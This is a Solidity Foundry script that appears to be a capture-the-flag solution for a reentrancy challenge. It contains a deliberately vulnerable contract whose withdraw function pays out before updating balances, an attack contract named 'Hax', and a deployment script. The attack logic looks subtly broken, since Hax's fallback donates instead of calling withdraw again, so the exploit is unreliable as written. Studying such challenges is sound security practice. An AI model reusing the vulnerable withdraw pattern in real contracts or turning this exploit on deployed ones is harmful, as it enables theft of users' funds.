🐙 made with https://github.com/rerrorctf/ret

Reentrancy.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.12;

import "openzeppelin-contracts-06/math/SafeMath.sol";
import "forge-std/Script.sol";
import "forge-std/console.sol";

contract Reentrance {
    using SafeMath for uint256;

    mapping(address => uint256) public balances;

    function donate(address _to) public payable {
        balances[_to] = balances[_to].add(msg.value);
    }

    function balanceOf(address _who) public view returns (uint256 balance) {
        return balances[_who];
    }

    function withdraw(uint256 _amount) public {
        if (balances[msg.sender] >= _amount) {
            (bool result,) = msg.sender.call{value: _amount}("");
            if (result) {
                _amount;
            }
            balances[msg.sender] -= _amount;
        }
    }

    receive() external payable {}
}

interface IWithdraw {
  function donate(address _to) external payable;
  function withdraw(uint256 _amount) external;
}

contract Hax {
  IWithdraw draw;
  bool public stop = false;

  constructor(address _addr) public payable {
    draw = IWithdraw(_addr);
    draw.donate{value: 0.001 ether}(address(this));
    draw.withdraw(0.001 ether);
  }

  fallback() external payable {
    draw.donate{value: 0.002 ether}(address(this));
  }
}

contract ReentranceHax is Script {
  function run() external {
    // vm.startBroadcast(vm.envUint("PRIVATE_KEY"));
    vm.startBroadcast();
    Reentrance re = new Reentrance();
    new Hax{value: 0.005 ether}(address(re));
    vm.stopBroadcast();
  }
}